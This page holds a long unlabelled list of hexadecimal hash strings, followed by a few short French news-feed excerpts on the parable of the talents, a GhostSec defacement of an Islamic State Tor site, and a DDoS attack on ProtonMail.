 56dedd0ca8849891486e23a53acb66ed

 5702f860032be6a67d5ead51191f90a8

 57343fd964265e6472e87a4f6c626763

 5814b9a4b3f10abe74b61901ee151a9f

 5a95d673b2c2d758c7d456c421ba1719

 5b6c7341a08f5cd4c27f443e3c057dd1

 5b7b1c1d3102a04e88ddfe8f27ffa2f2

 5bc0678baa1f30b89b80dcc7cf4431dc

 5c318b3ba77d0052427c7bffeb02a09f

 5de94bc0c4cc183c0ee5a48a7ae5ae43

 5e47b31cf973beba682c2973ed3dc787

 5e5f6b1fe260475872192d2ec3cb1462

 5e9773741a5e18672664121f8e5f4191

 5f08343486e42a0f8db0c0647c8255d1

 609e0b1940d034b6d222138e312c8dd2

 60b89dc654ed71053466b6c1f9bec260

 6148b71d713c80af2acfd3506d72a7a4

 6179d744808ad893dabb7b7de6b4a488

 619dade7c5a7444397b25c8e9a477e96

 61e67e7f1e2644bb559902ba90e438a5

 62186f41850c54a46252a7291060760d

 64c2cbc4bfd487e30f7b925fbbc751b0

 65eab2ed600f5ae45fe916a573ce72b0

 66e9dca8bb42dd41684c961951557109

 67fe7190cefc9dad506ed3c1734ff708

 692989b9681f80e9051359d15ec2297f

 6ae2e0ed9ae6dca4ea1ba71ae287406c

 6de02d603b741c7a5fc949952088f567

 6e2b5af3acf5306d8ac264a47193fe49

 6ee8919bd388494e5694b39ae24bd484

 6ef671cfdf28c7252db1c451ca37ec9a

 70122f367b82c8dd489b0fafa32d0362

 7064de8a83750bd1b38c23324b3757e3

 7089021c4ac0a7f38d52206653070af9

 7211a069239cb354c6029f963c2a5f06

 73d14b09f12eca5af555e5d205808064

 7511ed572f555af27c47f2a02b64302d

 75aab55e822bbca87f60970d37c8d7b3

 75d87e15a789770c242fec0867359588

 75e18289c8e9cc484e7e43ca656be24a

 76546e44fe4761503cb807a8d96a6719

 766084da85eab06dc639a62ff381b541

 778cc7e83ad27c92f30cea519989f47b

 788f75bf8f1330ec78d5d454bf88d17f

 79736c03eeda35ab7c3b6656048c0247

 7b853f8219384485b8753a58259ad171

 7c3e5bace659e9ddf7444b744a8667e9

 7d1c2d11a9b68a107ffb32c86675d8e9

 7d91f480e5a0c4372a43103f678eb328

 7e0671fc66f9a482000414212bf725e3

 7f79a0ccc91f654de59c361af1964354

 80a80e9f0b241ab3d0d9febab34d0e56

 822c9b26e833e83790433895fe7e2d3b

 836e64f3e9046e08cdf66b944718e48b

 83e4610c9500a48b8d1721c11e5797e2

 84354edd9292441aeed05c548fdaed7c

 84d600d85a061fa137e4b8fc82e1de2f

 851953bee7687d96891f45f24297a50b

 8599910e19552c9aa26db7be3e04be55

 859e9dbcbd0db577ff401537ae560e74

 85d866a99d6b130cbdde3949c015fec4

 86484d0e432e8c7e8f1b213413157138

 8895d772158f5456a80a2093aad516a2

 895a3b66c76c169b02843468062b1c5d

 895ef967c9ee97c5b9f3bdc426f6ad0f

 898683c4f39ad83f53f38460e170fd77

 8a0aae077c62d37ba9aeed2ad441dcf3

 8a5c4d1d946a01b56f180c930438c1e9

 8b56c493375d3b65d509793751509ba5

 8ceb4223e6238955fa7e154a794d5d04

 8d7c7392767415031d9ded205f0b29ef

 8dadd1162d01911160a5dbcdf081c5ba

 8e1207efd35f03caf74fdff314368da9

 8e5e0eb98e813371653b09864d4fc76a

 8f0243b5077bdb23baa1ceeedc697ff0

 8f11770349001409163245422b8d4442

 8f1fa31155a38ce3d6bc0fba43a82362

 90366f0731b60cf0c9959f06509d9ff5

 91a2746500d253633dd953692183fd76

 91c6a4e86d72c60beef95b75f9b4be82

 93323852f58c4e1b436a671651cc4998

 93b8d4d9704c13d983cf99a1296259d2

 940981070911dee2e2818216047d2ecb

 9461365a2bed17fb5b41536bf07ba165

 95921f248cd912e301c6b04120714d1f

 960d7dfa6f9c110732c34025687d5b60

 9621369183946ebb60d9959828dd5e16

 97cbd88d4414b41939571e994add3756

 99236003238f8ee88b5c4c8d02fdd17d

 9ab4cbd602ad8e5434e863bf0d84be2f

 9ba65c06057c179efbc8a62f86f2db71

 9bdb39a159774154fabc23d06ad8d131

 9c3ba2e8d172253e9d8ce30735bfbf78

 9cf27a07e0a4a6f6b1a8958241a6a83f

 9e173831c7f300e9dca9ee8725a34c5a

 9e7d24027621c0ecfd13995f2e098e8c

 9f723da52e774a6c5d03d8ba5f6af51f

 a0c486b879e20d5ac1774736b48e832b

 a152ea9ee04ca9790d195f9f3209b24a

 a1803ced57c1917f642ed407fc006659

 a1c504f51654200e6d0e424f38700f14

 a1d5f30ea6fc30d611c2636da4e763d4

 a1e7602b96d78fc37b5e1d271dbab273

 a2c5ffc33a96c6b10ae9afdaf5d00e62

 a31adc93ea76a4e2dfb6ae199fc0a294

 a3aaff686bf34d60b8319ef2525387d3

 a3ecea301bbe612ef9e17a502ee94b21

 a44b5c01378dd89c1c17565736f6c47b

 a4c8b0199f92f9be7b482df2bcce8162

 a4cba22ecfa33d1a4ad69be4616eeaf7

 a4f19520957bee3d68755a3978fb16be

 a61d0ea6e5711135383a3592e6b31e49

 a639338fd99cfd50292425d36618074c

 a6c5d89df0774fdd1643080548bfe718

 a893d3cfce6e8869b35a8140089ec854

 a8f2d507661b76a94971dcf7d593fc8a

 a9776f2633565419e55f6842a0b74278

 a9ce99d1788c13edaa3fb7f92ebb1240

 aa48cd40fcfe561bb5cd274549c94d6f

 aa5216ce42e1c279042662c018509140

 aa735ae056b57471bbe3499517afd057

 ac6a922fd8c604eb56da5413c2368be7

 ac8ad3eb56d2a94db30d3f4acfe4b548

 acfc48ed626369cf0fb6e1872c92e1bd

 ad75d090f865cbab68c411682ad2eb89

 ad99f483836492e34c072764db219fe4

 addd10c396fb3c1998ea451710f6f6f6

 aea04d46b9a4097155afcb3a80aafb8f

 af60a1f801ee3d5ba256c9354d8e9ca3

 af732879ff0b20eb02386a16581c8a4b

 afbfbb0fc1e7cbf56732d2afaeb21302

 b0737a9732647803bab45e64b4dc8f42

 b11bb0abd2a72e0ca88fe9817d42e139

 b2e0eae1d879287da6155ffa1ffff440

 b371fd7024687fa205135e2f3425822d

 b4298ce2eab75b9729ae3ac54e44e4d1

 b536f2134d75a4ac257071615e227a7d

 b56b456488358fcdc0ce95df7e0309cf

 b57618a7098fa9fcc14b8779b71ba62a

 b5afb1b35f7ee56218ee1c0d6ba92fb7

 b5f1fe0ab8ef34d6429916b6257e682b

 b66eb248e1ca0c35bc7e518fa4d5757a

 b6f52abceb49c6d38e29de6951f768fa

 b7343a1094f139699bc4698343d2b7ad

 b80f53f44e737aa1ecc40a1c5cf10a5d

 b9057cc24a9d4bde42198d3956ee46e6

 b9680d7e427bc2a3ed0320fb15023a88

 ba1c5315933c1a4d446bf90eb9d7c8c6

 bbb20fe1b97f12934b70cb1a7d2399d4

 bbfac3011f9e3b239e4eb9f9d6b82763

 bcd595f9eb7fba9fa82c21805ebb1535

 bd8c50221e6ec939f7b4df54795bca20

 bd9ebb6baf95d25fc54568bb4c37567b

 bddd52910f0c40b538418144ae0b63ac

 bde66ebf8cd08b301b0b6c3140df5fed

 be10e76060c3bbc59c1d87bdc3abeb12

 c23c4130ffebf9ffe60136b7099f8603

 c2eb3eed3f2082cf05e7c785cfab5487

 c36230f577cfa4d25e29be00ada59d91

 c39f6e984efcbf40612a3acb780b638a

 c528caa8cffd76825748507b8b0ad03e

 c5dd6c26c4c1e03fd1ec51cb1dec91ca

 c620fef9ebfa83e84c51134d14d44ec8

0c3dbcffb91d154b2b320b2fce972f39

27660806ff465edbe0f285ab67a9a348

36966643d45c09afb42a40fa6f71b38c

458a8c5f99417f5031885116e40117ae

4aebe1ff92fad7c4dba9f8a26b6a61d3

551f94100c04ed328ddeaf4817734eb5

6fb3c026537a0248f4ef40b98a9f1821

acf114610271e97cb58b172d135564bb

ccabfa1d72797c635eb241f82a892e22

cf5451b8b53092266321a421ba9224ca

d5ea3a22bce77e4bc279ca7903c3288a

d8caad151e07025fdbf5f3c26e3ceaff

eb7d7dacebba8741c2d483f0fcabdc82

 

22 Mar 10:03

Connaissance du 19/03/2016

La "parabole des talents" est un chapitre de l'Evangile selon Saint Matthieu. Celui-ci incite à faire des placements financiers et explique les bases du capitalisme actuel (on prend aux pauvres pour donner à celui qui a déjà beaucoup).
26 Nov 09:40

GhostSec pirate l'État islamique avec du prozac

GhostsSec, un groupe souvent associé à Anonymous, vient de frapper fort en piratant un des sites de l’État islamique sur le réseau Tor et en remplaçant la page d’accueil par une publicité pour une pharmacie en ligne...








24 Nov 13:50

ProtonMail, le Webmail anti-NSA, s'est relevé de la "plus grande cyber-attaque de Suisse"

Le service d'e-mail hyper-sécurisé suisse ProtonMail a subi une attaque DDoS d'une ampleur inégalée en Suisse. Indisponible 5 jours, il est parvenu à se relever mais l'attaque continue. Prot [...]